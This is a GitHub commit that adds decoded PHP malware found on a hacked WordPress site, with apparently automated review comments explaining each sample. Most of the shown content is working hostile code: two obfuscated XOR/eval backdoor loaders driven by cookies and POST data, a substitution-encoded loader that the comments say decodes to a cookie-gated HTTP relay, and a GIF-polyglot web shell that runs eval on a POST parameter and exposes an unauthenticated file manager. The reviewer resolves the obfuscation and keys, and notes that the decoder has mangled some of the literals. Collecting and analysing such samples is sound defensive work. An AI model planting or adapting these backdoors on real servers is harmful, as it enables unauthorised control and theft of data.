
Commit a68b200

Merge pull request mattiasgeniar#20 from ChexWarrior/master
Some scripts I found on a recently hacked WordPress site
2 parents a543966 + c9a7090 commit a68b200

17 files changed

+12514
-0
lines changed

found_on_wordpress/class-wp-widget-archives_render.php.suspected

Lines changed: 2480 additions & 0 deletions

found_on_wordpress/class-wp-widget-archives_render.php_backup

Lines changed: 2480 additions & 0 deletions

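--- a/found_on_wordpress/hozwfbdp.php
+++ b/found_on_wordpress/hozwfbdp.php
@@ -0,0 +1,32 @@
+/* Decoded by unphp.net */
+
+<?php
+$falwt = 't9ke0fbvoxn#8ruy_*\'lHi7adscm34gp-';
+$pexaijc = Array();
+$pexaijc[] = $falwt[20] . $falwt[17];
+$pexaijc[] = $falwt[3] . $falwt[24] . $falwt[12] . $falwt[4] . $falwt[23] . $falwt[12] . $falwt[22] . $falwt[29] . $falwt[32] . $falwt[23] . $falwt[12] . $falwt[3] . $falwt[23] . $falwt[32] . $falwt[29] . $falwt[6] . $falwt[24] . $falwt[24] . $falwt[32] . $falwt[1] . $falwt[5] . $falwt[5] . $falwt[1] . $falwt[32] . $falwt[26] . $falwt[29] . $falwt[24] . $falwt[24] . $falwt[5] . $falwt[6] . $falwt[23] . $falwt[28] . $falwt[12] . $falwt[1] . $falwt[6] . $falwt[29];
+$pexaijc[] = $falwt[11];
+$pexaijc[] = $falwt[26] . $falwt[8] . $falwt[14] . $falwt[10] . $falwt[0];
+$pexaijc[] = $falwt[25] . $falwt[0] . $falwt[13] . $falwt[16] . $falwt[13] . $falwt[3] . $falwt[31] . $falwt[3] . $falwt[23] . $falwt[0];
+$pexaijc[] = $falwt[3] . $falwt[9] . $falwt[31] . $falwt[19] . $falwt[8] . $falwt[24] . $falwt[3];
+$pexaijc[] = $falwt[25] . $falwt[14] . $falwt[6] . $falwt[25] . $falwt[0] . $falwt[13];
+$pexaijc[] = $falwt[23] . $falwt[13] . $falwt[13] . $falwt[23] . $falwt[15] . $falwt[16] . $falwt[27] . $falwt[3] . $falwt[13] . $falwt[30] . $falwt[3];
+$pexaijc[] = $falwt[25] . $falwt[0] . $falwt[13] . $falwt[19] . $falwt[3] . $falwt[10];
+$pexaijc[] = $falwt[31] . $falwt[23] . $falwt[26] . $falwt[2];
+foreach ($pexaijc[7]($_COOKIE, $_POST) as $qvhieyr => $iqtbkxe) {
+function ypvajaz($pexaijc, $qvhieyr, $coijg) {
+return $pexaijc[6]($pexaijc[4]($qvhieyr . $pexaijc[1], ($coijg / $pexaijc[8]($qvhieyr)) + 1), 0, $coijg);
+}
+function oybwfz($pexaijc, $imvmdw) {
+return @$pexaijc[9]($pexaijc[0], $imvmdw);
+}
+function jdkzd($pexaijc, $imvmdw) {
+$rvttfi = $pexaijc[3]($imvmdw) % 3;
+if (!$rvttfi) {
+eval($imvmdw[1]($imvmdw[2]));
+exit();
+}
+}
+$iqtbkxe = oybwfz($pexaijc, $iqtbkxe);
+jdkzd($pexaijc, $pexaijc[5]($pexaijc[2], $iqtbkxe ^ ypvajaz($pexaijc, $qvhieyr, $pexaijc[8]($iqtbkxe))));
+} ?>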
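Review bot: Nothing in the file or the commit records what the index-built strings on lines 6–15 resolve to, so every analyst who opens this sample has to redo the table lookup; a one-line header comment would fix that. Resolving `$falwt` gives `$pexaijc` = [`H*`, `ed80a874-a8ea-4bdd-9ff9-c4ddfba389b4`, `#`, `count`, `str_repeat`, `explode`, `substr`, `array_merge`, `strlen`, `pack`], so the loop hex-decodes each cookie/POST value with `pack('H*', ...)`, XORs it against the parameter name concatenated with that UUID (repeated to payload length), splits on `#`, and `eval`s `$parts[1]($parts[2])` whenever the part count is a multiple of 3. The `/* Decoded by unphp.net */` header also means this is decoder output rather than the bytes found on disk, so a hash of this file will not match the live sample. Suggested comment after line 3: `// XOR/eval loader: key = param name + 'ed80a874-a8ea-4bdd-9ff9-c4ddfba389b4'; runs part[1](part[2]) of the '#'-split plaintext`.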

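--- a/found_on_wordpress/jhefppgr.php
+++ b/found_on_wordpress/jhefppgr.php
@@ -0,0 +1,32 @@
+/* Decoded by unphp.net */
+
+<?php
+$itsve = 'v\'xntuec24s_m1bH7#-l5d8*9k0aroypfgi';
+$inzbmds = Array();
+$inzbmds[] = $itsve[15] . $itsve[23];
+$inzbmds[] = $itsve[17];
+$inzbmds[] = $itsve[7] . $itsve[6] . $itsve[26] . $itsve[21] . $itsve[24] . $itsve[32] . $itsve[7] . $itsve[24] . $itsve[18] . $itsve[9] . $itsve[7] . $itsve[27] . $itsve[14] . $itsve[18] . $itsve[9] . $itsve[13] . $itsve[22] . $itsve[24] . $itsve[18] . $itsve[24] . $itsve[21] . $itsve[32] . $itsve[16] . $itsve[18] . $itsve[32] . $itsve[9] . $itsve[8] . $itsve[7] . $itsve[26] . $itsve[32] . $itsve[6] . $itsve[13] . $itsve[7] . $itsve[6] . $itsve[20] . $itsve[7];
+$inzbmds[] = $itsve[7] . $itsve[29] . $itsve[5] . $itsve[3] . $itsve[4];
+$inzbmds[] = $itsve[10] . $itsve[4] . $itsve[28] . $itsve[11] . $itsve[28] . $itsve[6] . $itsve[31] . $itsve[6] . $itsve[27] . $itsve[4];
+$inzbmds[] = $itsve[6] . $itsve[2] . $itsve[31] . $itsve[19] . $itsve[29] . $itsve[21] . $itsve[6];
+$inzbmds[] = $itsve[10] . $itsve[5] . $itsve[14] . $itsve[10] . $itsve[4] . $itsve[28];
+$inzbmds[] = $itsve[27] . $itsve[28] . $itsve[28] . $itsve[27] . $itsve[30] . $itsve[11] . $itsve[12] . $itsve[6] . $itsve[28] . $itsve[33] . $itsve[6];
+$inzbmds[] = $itsve[10] . $itsve[4] . $itsve[28] . $itsve[19] . $itsve[6] . $itsve[3];
+$inzbmds[] = $itsve[31] . $itsve[27] . $itsve[7] . $itsve[25];
+foreach ($inzbmds[7]($_COOKIE, $_POST) as $mgvsei => $azxre) {
+function beanjw($inzbmds, $mgvsei, $vjozofh) {
+return $inzbmds[6]($inzbmds[4]($mgvsei . $inzbmds[2], ($vjozofh / $inzbmds[8]($mgvsei)) + 1), 0, $vjozofh);
+}
+function fwixisz($inzbmds, $fpkofng) {
+return @$inzbmds[9]($inzbmds[0], $fpkofng);
+}
+function lfbsd($inzbmds, $fpkofng) {
+$hvgkefx = $inzbmds[3]($fpkofng) % 3;
+if (!$hvgkefx) {
+eval($fpkofng[1]($fpkofng[2]));
+exit();
+}
+}
+$azxre = fwixisz($inzbmds, $azxre);
+lfbsd($inzbmds, $inzbmds[5]($inzbmds[1], $azxre ^ beanjw($inzbmds, $mgvsei, $inzbmds[8]($azxre))));
+} ?>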
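Review bot: This is the same loader as hozwfbdp.php with only the per-sample key and the order of two table entries changed, and nothing in the commit says so; a cross-reference in a header comment would stop the pair being triaged twice. Resolving `$itsve` gives `$inzbmds` = [`H*`, `#`, `ce0d9fc9-4cab-4189-9df7-f42c0fe1ce5c`, `count`, `str_repeat`, `explode`, `substr`, `array_merge`, `strlen`, `pack`] — the separator and UUID sit at indices 1 and 2 here where hozwfbdp.php has them swapped — and the decode path on lines 30–31 is otherwise identical: hex-unpack, XOR with parameter name + UUID, split on `#`, `eval` `$parts[1]($parts[2])` when the part count is divisible by 3. Suggested comment after line 3: `// Same XOR/eval loader as hozwfbdp.php; key UUID ce0d9fc9-4cab-4189-9df7-f42c0fe1ce5c`.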

found_on_wordpress/moyudazh.php

Lines changed: 17 additions & 0 deletions
@@ -0,0 +1,17 @@
1+
/* Decoded by unphp.net */
2+
3+
<?php
4+
$gbskgpxfbu = 353;
5+
function bkkbhgsl($jxherahyp, $rivbujtkps) {
6+
$uaxnyvjrp = '';
7+
for ($i = 0;$i < strlen($jxherahyp);$i++) {
8+
$uaxnyvjrp.= isset($rivbujtkps[$jxherahyp[$i]]) ? $rivbujtkps[$jxherahyp[$i]] : $jxherahyp[$i];
9+
}
10+
$owsngmi = "rawurl" . "decode";
11+
return $owsngmi($uaxnyvjrp);
12+
}
13+
$rramrnnyf = '%GLX7X_B2J%z4%zg5XBsUrj_2vvxvB%zg%zqL%za%pF%LE%LD%GLX7X_B2J%z4%zgUxV_2vvxvB%zg%zqL' . '%za%pF%LE%LD%GL2vvxv_v2sxvJX7V%z4L%za%pF%LE%LD%GLB2J_' . 'JXW2_UXWXJ%z4L%za%pF%LE%LD%GLXV7xv2_eB2v_rkxvJ%z4w%za%pF%LE%LD%GLX7X_' . 'B2J%z4%zgWrd_2d2SeJXx7_JXW2%zg%zqL%za%pF%LE%LD%LE%LDyxv2rSN%zL%z4%zG_qIIYfR%zLrB%zL%zGXJ2W%za' . '%LE%LD%gF%LE%LD%zL%zL%zL%zLXy%zL%z4%zGXJ2W%zL%zw%pE%zL%zz' . 'hGawkr2y-z4la-G5pz-awSS-a2lwS4lSypLp%zz%za%LE%LD%zL%zL%zL%' . 'zL%zL%zL%zL%zL2dXJ%z4%za%pF%LE%LD%gE%LE%LD%LE%LD%zG5' . 'rJr%zL%pE%zLyXU2_V2J_Sx7J27JB%z4%zgsNs%pD//X7seJ%zg%za%pF%LE%LD%zG5rJr%zL%pE%zLBsUXJ%z4%zz%' . 'pE%zz%zq%zG5rJr%zqz%za%pF%LE%LD%LE%LD%zGkhG_52Sx52_5rJr%zL%pE%zLkrB2hG_52Sx52%' . 'z4evU52Sx52%z4%zG5rJr%lFw%lE%za%za%pF%LE%LD%LE%LD%' . 'zGB275_5rJr%zL%pE%zLe7B2vXrUXK2%z452SvjsJ%z4%zGkhG_52Sx52_5rJr%za%za%pF%LE%LD%LE%LD%zGv' . '2BeUJ%zL%pE%zLB275_5rJrw%zL%z4%zGB275_5rJr%za%pF%LE%LD%LE%LDXy%zL%z4%zw%zGv2BeUJ%za%LE%LD%gF%LE%LD%z' . 'L%zL%zL%zL%zGv2BeUJ%zL%pE%zLB275_5rJrz%z4%zGB275_5rJr%za%pF%LE%LD%gE%LE%LD%LE%LD2SNx%zL%zGv2BeUJ' . '%pF%LE%LD%LE%LDye7SJXx7%zL52SvjsJ%z4%zG5rJr%za%LE%LD%gF%LE%LD' . '%zL%zL%zL%zL%zGxeJ_5rJr%zL%pE%zL%zz%zz%pF%LE%LD%zL%zL%zL%zL%zGo2j%zL' . '%pE%zL%zG_ORAMRA%lF%zgQbb1_QIOb%zg%lE%zL.%zL%zG_ORAMRA%lF%zgAR09ROb_9Af%zg%lE%pF%L' . 'E%LD%zL%zL%zL%zL%zGo2j_U27%zL%pE%zLBJvU27%z4%zGo2j%za%pF%LE%LD%zL%LE%LD%zL%zL%zL%zLyx' . 'v%zL%z4%zGX%pEL%pF%zL%zGX%zL%pq%zLBJvU27%z4%zGo2j%za%pF%zL%zGX%zF%zF%za%' . 'LE%LD%zL%zL%zL%zL%gF%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%zGo2j%lF%zGX%lE%zL%pE%zLSNv%z4' . 'xv5%z4%zGo2j%lF%zGX%lE%za%zL%lR%zL%z4%zGo2j_U27%zL%zl%zLzll%za%za%pF%LE%LD%zL' . '%zL%zL%zL%gE%LE%LD%LE%LD%zL%zL%zL%zLyxv%zL%z4%zGX%pEL%pF%zL%zGX%pqBJvU2' . '7%z4%zG5rJr%za%pF%za%LE%LD%zL%zL%zL%zL%gF%LE%LD%zL%zL%zL%zL%zL%zL%zL%zLyxv%zL%z4%zG' . 't%pEL%pF%zL%zGt%pqBJvU27%z4%zGo2j%za%zL%zh%zh%zL%zGX%pqBJvU' . '27%z4%zG5rJr%za%pF%zL%zGt%zF%zF%zq%zL%zGX%zF%zF%za%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%gF%LE%LD%zL%zL%zL' . 
'%zL%zL%zL%zL%zL%zL%zL%zL%zL%zGxeJ_5rJr%zL.%pE%zLSNv%z4xv5%z4%zG5rJr%lF%zGX%lE%za%zL' . '%lR%zLxv5%z4%zGo2j%lF%zGt%lE%za%za%pF%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL' . '%gE%LE%LD%zL%zL%zL%zL%gE%LE%LD%LE%LD%zL%zL%zL%zLv2Jev7%zL' . '%zGxeJ_5rJr%pF%LE%LD%gE%LE%LD%LE%LDye7SJXx7%zLB275_5rJrw%z4%zG5rJr%za%LE%LD%gF%LE%LD%zL%zL%zL%' . 'zL%zGN2r5%zL%pE%zL%zz%zz%pF%LE%LD%LE%LD%zL%zL%zL%zLyxv2rSN%z4%zG5rJr%lF%zzN2r52' . 'vB%zz%lE%zLrB%zL%zGo2j%pE%pR%zGmrUe2%za%LE%LD%zL%zL%zL%zL%gF%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%' . 'zGN2r5%zL.%pE%zL%zGo2j%zL.%zL%zz%pD%zL%zz%zL.%zL%zGmrUe2%zL.%zL%zz%lqv' . '%lq7%zz%pF%LE%LD%zL%zL%zL%zL%gE%LE%LD%LE%LD%zL%zL%zL%zL%zGsrvrWB%zL%pE%zLrvvrj%' . 'z4%zgNJJs%zg%zL%pE%pR%zLrvvrj%z4%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%zgW2JNx5%zg%zL%pE' . '%pR%zL%zG5rJr%lF%zzW2JNx5%zz%lE%zq%LE%LD%zL%zL%zL%zL%zL%zL%zL%' . 'zL%zgN2r52v%zg%zL%pE%pR%zL%zGN2r5%zq%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%zgSx7J27J%' . 'zg%zL%pE%pR%zL%zG5rJr%lF%zzkx5j%zz%lE%zq%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%zgJXW2xeJ%zg%zL%pE%pR%zL%' . 'zG5rJr%lF%zzJXW2xeJ%zz%lE%zq%LE%LD%zL%zL%zL%zL%zL%zL' . '%zL%zL%LE%LD%zL%zL%zL%zL%za%za%pF%LE%LD%LE%LD%zL%zL%zL%zL%zGSJd%zL%pE%z' . 'LBJv2rW_Sx7J2dJ_Sv2rJ2%z4%zGsrvrWB%za%pF%LE%LD%zL%zL%zL%zL%LE%LD%zL%zL%zL%zL%zGv2BeUJ%zL%pE%zL%' . 'GLyXU2_V2J_Sx7J27JB%z4%zG5rJr%lF%zzevU%zz%lE%zq%zLPDiOR%zq%zL%zGSJd%za%pF%LE%LD%LE%LD%zL%zL' . '%zL%zLXy%zL%z4%zGNJJs_v2Bsx7B2_N2r52v%za%LE%LD%zL%zL%zL%zL%gF%LE%LD%zL%zL%zL%' . 'zL%zL%zL%zL%zLXy%zL%z4BJvsxB%z4%zGNJJs_v2Bsx7B2_N2r52v%' . 'lFL%lE%zq%zL%zzzLL%zz%za%zL%pE%pE%pE%zLPDiOR%za%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%gF%LE%LD%zL%' . 'zL%zL%zL%zL%zL%zL%zL%zL%zL%zL%zL%zGv2BeUJ%zL%pE%zL%zzQbb1_RAAIA%lqJ%zz%zL.%zL%zGNJJs_v2Bsx7' . 'B2_N2r52v%lFL%lE%pF%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%gE%LE%LD%zL%zL%zL%zL%gE%LE%LD%zL%zL%zL%zL2UB2%L' . 'E%LD%zL%zL%zL%zL%gF%LE%LD%zL%zL%zL%zL%zL%zL%zL%zL%zGv2BeUJ%zL%pE%zL%zzqI88RqbfI8_RAAIA%z' . 'z%pF%LE%LD%zL%zL%zL%zL%gE%LE%LD%LE%LD%zL%zL%zL%zLv2Jev7%zL%zGv2BeUJ%pF%LE%LD%gE%LE%LD%LE%LDy' . 
'e7SJXx7%zLB275_5rJrz%z4%zG5rJr%za%LE%LD%gF%LE%LD%zL%zL%zL%zL//%zLeB2%zLBxSo2JB' . '%LE%LD%gE';
14+
$gbltknoanv = Array('1' => 'P', '0' => 'Q', '3' => 'W', '2' => 'e', '5' => 'd', '4' => '8', '7' => 'n', '6' => 'Z', '9' => 'U', '8' => 'N', 'A' => 'R', 'C' => 'X', 'B' => 's', 'E' => 'D', 'D' => 'A', 'G' => '4', 'F' => 'B', 'I' => 'O', 'H' => 'q', 'K' => 'z', 'J' => 't', 'M' => 'V', 'L' => '0', 'O' => 'S', 'N' => 'h', 'Q' => 'H', 'P' => 'F', 'S' => 'c', 'R' => 'E', 'U' => 'l', 'T' => 'G', 'W' => 'm', 'V' => 'g', 'Y' => 'K', 'X' => 'i', 'Z' => 'Y', 'a' => '9', 'c' => 'w', 'b' => 'T', 'e' => 'u', 'd' => 'x', 'g' => '7', 'f' => 'I', 'i' => 'L', 'h' => '6', 'k' => 'b', 'j' => 'y', 'm' => 'v', 'l' => '5', 'o' => 'k', 'n' => 'M', 'q' => 'C', 'p' => '3', 's' => 'p', 'r' => 'a', 'u' => 'J', 't' => 'j', 'w' => '1', 'v' => 'r', 'y' => 'f', 'x' => 'o', 'z' => '2');
15+
eval
16+
/*lglmb*/
17+
(bkkbhgsl($rramrnnyf, $gbltknoanv)); ?>
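Review bot: The substitution table plus `rawurldecode` make this the only sample in the commit whose behaviour cannot be read off the listing, and the file carries no note of what the `eval` on lines 15–17 runs; a header comment is needed. Applying `$gbltknoanv` to `$rramrnnyf` appears to yield a cookie-gated HTTP relay: each `$_COOKIE` value must equal `6491baef-e859-4d32-91cc-9e51c85cf303` or the script exits (an empty cookie jar passes the loop untouched), the raw `php://input` body is `split('=', ..., 2)`, urldecoded, base64-decoded, XOR-decrypted with a key built from `$_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']`, `unserialize`d, and its `method`/`headers`/`body`/`url`/`timeout` fields drive an outbound `file_get_contents` whose response (or `HTTP_ERROR`/`CONNECTION_ERROR`) is echoed back, with the `send_data2` socket fallback left as an empty stub. Since it relies on `split()`, which PHP 7 removed, it presumably only ran on a PHP 5 host. Suggested comment after line 3: `// Decodes to a cookie-gated outbound HTTP relay (php://input -> base64/XOR -> unserialize -> file_get_contents); gate value 6491baef-e859-4d32-91cc-9e51c85cf303`.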

found_on_wordpress/readonly_default.php.suspected

Lines changed: 2480 additions & 0 deletions

found_on_wordpress/readonly_default.php_backup

Lines changed: 2480 additions & 0 deletions

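--- a/found_on_wordpress/wp-blog.php
+++ b/found_on_wordpress/wp-blog.php
@@ -0,0 +1,269 @@
+/* Decoded by unphp.net */
+
+<?php ?>gif89a<?php eval($_POST['pass']); ?>
+<?php
+ini_set('display_errors', 'On');
+error_reporting(E_ALL);
+set_time_limit(0);
+error_reporting(0);
+if (get_magic_quotes_gpc()) {
+foreach ($_POST as $key => $value) {
+$_POST[$key] = stripslashes($value);
+}
+}
+echo '<!DOCTYPE HTML>
+<HTML>
+<HEAD>
+<link href="" rel="stylesheet" type="text/css">
+<title>Webshell</title>
+<style>
+body{
+font-family: "Racing Sans One", cursive;
+background-color: #e6e6e6;
+text-shadow:0px 0px 1px #757575;
+}
+#content tr:hover{
+background-color: #636263;
+text-shadow:0px 0px 10px #fff;
+}
+#content .first{
+background-color: silver;
+}
+#content .first:hover{
+background-color: silver;
+text-shadow:0px 0px 1px #757575;
+}
+table{
+border: 1px #000000 dotted;
+}
+H1{
+font-family: "Rye", cursive;
+}
+a{
+color: #000;
+text-decoration: none;
+}
+a:hover{
+color: #fff;
+text-shadow:0px 0px 10px #ffffff;
+}
+input,select,textarea{
+border: 1px #000000 solid;
+-moz-border-radius: 5px;
+-webkit-border-radius:5px;
+border-radius:5px;
+}
+</style>
+</HEAD>
+<BODY>
+<center>
+<tr><td>Current Path : ';
+if (isset($_GET['path'])) {
+$path = $_GET['path'];
+} else {
+$path = getcwd();
+}
+$path = str_replace('\',' / ',$path);
+$paths = explode(' / ',$path);
+
+foreach($paths as $id=>$pat){
+if($pat == '' && $id == 0){
+$a = true;
+echo ' < ahref = "?path=/" > / < / a > ';
+continue;
+}
+if($pat == '') continue;
+echo ' < ahref = "?path=';
+for($i=0;$i<=$id;$i++){
+echo "$paths[$i]";
+if($i != $id) echo " / ";
+}
+echo '" > '.$pat.' < / a > / ';
+}
+echo ' < / td > < / tr > < tr > < td > ';
+if(isset($_FILES['file'])){
+if(copy($_FILES['file']['tmp_name'],$path.' / '.$_FILES['file']['name'])){
+echo ' < fontcolor = "green" > FileUploadDone . < / font > < br / > ';
+}else{
+echo ' < fontcolor = "red" > FileUploadError . < / font > < br / > ';
+}
+}
+echo ' < b > < br > < br > '.php_uname().' < br > < / b > < br > ';
+echo ' < formenctype = "multipart/form-data"method = "POST" > UploadFile: < inputtype = "file"name = "file" / > < inputtype = "submit"value = "upload" / > < / form > < / td > < / tr > ';
+if(isset($_GET['filesrc'])){
+echo "<tr><td>Current File : ";
+echo $_GET['filesrc'];
+echo ' < / tr > < / td > < / table > < br / > ';
+echo(' < pre > '.htmlspecialchars(file_get_contents($_GET['filesrc'])).' < / pre > ');
+}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
+echo ' < / table > < br / > < center > '.$_POST['path'].' < br / > < br / > ';
+if($_POST['opt'] == 'chmod'){
+if(isset($_POST['perm'])){
+if(chmod($_POST['path'],$_POST['perm'])){
+echo ' < fontcolor = "green" > ChangePermissionDone . < / font > < br / > ';
+}else{
+echo ' < fontcolor = "red" > ChangePermissionError . < / font > < br / > ';
+}
+}
+echo ' < formmethod = "POST" > Permission: < inputname = "perm"type = "text"size = "4"value = "'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "chmod" > < inputtype = "submit"value = "Go" / > < / form > ';
+}elseif($_POST['opt'] == 'rename'){
+if(isset($_POST['newname'])){
+if(rename($_POST['path'],$path.' / '.$_POST['newname'])){
+echo ' < fontcolor = "green" > ChangeNameDone . < / font > < br / > ';
+}else{
+echo ' < fontcolor = "red" > ChangeNameError . < / font > < br / > ';
+}
+$_POST['name'] = $_POST['newname'];
+}
+echo ' < formmethod = "POST" > New Name: < inputname = "newname"type = "text"size = "20"value = "'.$_POST['name'].'" / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "rename" > < inputtype = "submit"value = "Go" / > < / form > ';
+}elseif($_POST['opt'] == 'edit'){
+if(isset($_POST['src'])){
+$fp = fopen($_POST['path'],'w');
+if(fwrite($fp,$_POST['src'])){
+echo ' < fontcolor = "green" > EditFileDone . < / font > < br / > ';
+}else{
+echo ' < fontcolor = "red" > EditFileError . < / font > < br / > ';
+}
+fclose($fp);
+}
+echo ' < formmethod = "POST" > < textareacols = 80rows = 20name = "src" > '.htmlspecialchars(file_get_contents($_POST['path'])).' < / textarea > < br / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "edit" > < inputtype = "submit"value = "Go" / > < / form > ';
+}
+echo ' < / center > ';
+}else{
+echo ' < / table > < br / > < center > ';
+if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
+if($_POST['type'] == 'dir'){
+if(rmdir($_POST['path'])){
+echo ' < fontcolor = "green" > DeleteDirDone . < / font > < br / > ';
+}else{
+echo ' < fontcolor = "red" > DeleteDirError . < / font > < br / > ';
+}
+}elseif($_POST['type'] == 'file'){
+if(unlink($_POST['path'])){
+echo ' < fontcolor = "green" > DeleteFileDone . < / font > < br / > ';
+}else{
+echo ' < fontcolor = "red" > DeleteFileError . < / font > < br / > ';
+}
+}
+}
+echo ' < / center > ';
+$scandir = scandir($path);
+echo ' < divid = "content" > < tablewidth = "700"border = "0"cellpadding = "3"cellspacing = "1"align = "center" > < trclass = "first" > < td > < center > Name < / center > < / td > < td > < center > Size < / center > < / td > < td > < center > Permissions < / center > < / td > < td > < center > Options < / center > < / td > < / tr > ';
+
+foreach($scandir as $dir){
+if(!is_dir("$path/$dir") || $dir == ' . ' || $dir == ' . . ') continue;
+echo "<tr>
+<td><a href=\"?path=$path/$dir\">$dir</a></td>
+<td><center>--</center></td>
+<td><center>";
+if(is_writable("$path/$dir")) echo ' < fontcolor = "green" > ';
+elseif(!is_readable("$path/$dir")) echo ' < fontcolor = "red" > ';
+echo perms("$path/$dir");
+if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ' < / font > ';
+
+echo "</center></td>
+<td><center><form method=\"POST\" action=\"?option&path=$path\">
+<select name=\"opt\">
+<option value=\"\"></option>
+<option value=\"delete\">Delete</option>
+<option value=\"chmod\">Chmod</option>
+<option value=\"rename\">Rename</option>
+</select>
+<input type=\"hidden\" name=\"type\" value=\"dir\">
+<input type=\"hidden\" name=\"name\" value=\"$dir\">
+<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
+<input type=\"submit\" value=\">\" />
+</form></center></td>
+</tr>";
+}
+echo ' < trclass = "first" > < td > < / td > < td > < / td > < td > < / td > < td > < / td > < / tr > ';
+foreach($scandir as $file){
+if(!is_file("$path/$file")) continue;
+$size = filesize("$path/$file")/1024;
+$size = round($size,3);
+if($size >= 1024){
+$size = round($size/1024,2).'MB';
+}else{
+$size = $size.'KB';
+}
+
+echo "<tr>
+<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
+<td><center>".$size."</center></td>
+<td><center>";
+if(is_writable("$path/$file")) echo ' < fontcolor = "green" > ';
+elseif(!is_readable("$path/$file")) echo ' < fontcolor = "red" > ';
+echo perms("$path/$file");
+if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ' < / font > ';
+echo "</center></td>
+<td><center><form method=\"POST\" action=\"?option&path=$path\">
+<select name=\"opt\">
+<option value=\"\"></option>
+<option value=\"delete\">Delete</option>
+<option value=\"chmod\">Chmod</option>
+<option value=\"rename\">Rename</option>
+<option value=\"edit\">Edit</option>
+</select>
+<input type=\"hidden\" name=\"type\" value=\"file\">
+<input type=\"hidden\" name=\"name\" value=\"$file\">
+<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
+<input type=\"submit\" value=\">\" />
+</form></center></td>
+</tr>";
+}
+echo ' < / table > < / div > ';
+}
+echo ' < br / > < / BODY > < / HTML > ';
+function perms($file){
+$perms = fileperms($file);
+
+if (($perms & 0xC000) == 0xC000) {
+// Socket
+$info = 's';
+} elseif (($perms & 0xA000) == 0xA000) {
+// Symbolic Link
+$info = 'l';
+} elseif (($perms & 0x8000) == 0x8000) {
+// Regular
+$info = ' - ';
+} elseif (($perms & 0x6000) == 0x6000) {
+// Block special
+$info = 'b';
+} elseif (($perms & 0x4000) == 0x4000) {
+// Directory
+$info = 'd';
+} elseif (($perms & 0x2000) == 0x2000) {
+// Character special
+$info = 'c';
+} elseif (($perms & 0x1000) == 0x1000) {
+// FIFO pipe
+$info = 'p';
+} else {
+// Unknown
+$info = 'u';
+}
+
+// Owner
+$info .= (($perms & 0x0100) ? 'r' : ' - ');
+$info .= (($perms & 0x0080) ? 'w' : ' - ');
+$info .= (($perms & 0x0040) ?
+(($perms & 0x0800) ? 's' : 'x' ) :
+(($perms & 0x0800) ? 'S' : ' - '));
+
+// Group
+$info .= (($perms & 0x0020) ? 'r' : ' - ');
+$info .= (($perms & 0x0010) ? 'w' : ' - ');
+$info .= (($perms & 0x0008) ?
+(($perms & 0x0400) ? 's' : 'x' ) :
+(($perms & 0x0400) ? 'S' : ' - '));
+
+// World
+$info .= (($perms & 0x0004) ? 'r' : ' - ');
+$info .= (($perms & 0x0002) ? 'w' : ' - ');
+$info .= (($perms & 0x0001) ?
+(($perms & 0x0200) ? 't' : 'x' ) :
+(($perms & 0x0200) ? 'T' : ' - '));
+
+return $info;
+}
+?>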
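Review bot: This listing is unphp.net beautifier output and several string literals were damaged on the way — line 66's `str_replace('\',' / ',$path)` has lost its backslash escape, and lines 72 onward carry spaces inside HTML tags (`' < ahref = "?path=/" > / < / a > '`) — so the file is neither the bytes found on the server nor valid PHP, and hashes or YARA strings lifted from it will not match the live sample; the undecoded original should be committed alongside it. The working parts are still clear: line 3 is a `gif89a` polyglot stub that `eval`s `$_POST['pass']` with no authentication (the GIF magic is presumably there to pass image-upload checks), `error_reporting(0)` on line 8 silently overrides lines 5–6, and the rest is an unauthenticated file manager taking `path`/`filesrc` from GET and `path`/`opt`/`src`/`perm`/`newname` from POST for read, write, chmod, rename, delete and upload. Suggested comment after line 1: `// Decoder output, not original bytes: string literals mangled (see line 66); polyglot GIF header + eval($_POST['pass']) on line 3, unauthenticated file manager below`.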

found_on_wordpress/wp-good5ccca1742d54d5ccca1742d553.php.suspected

Lines changed: 30 additions & 0 deletions
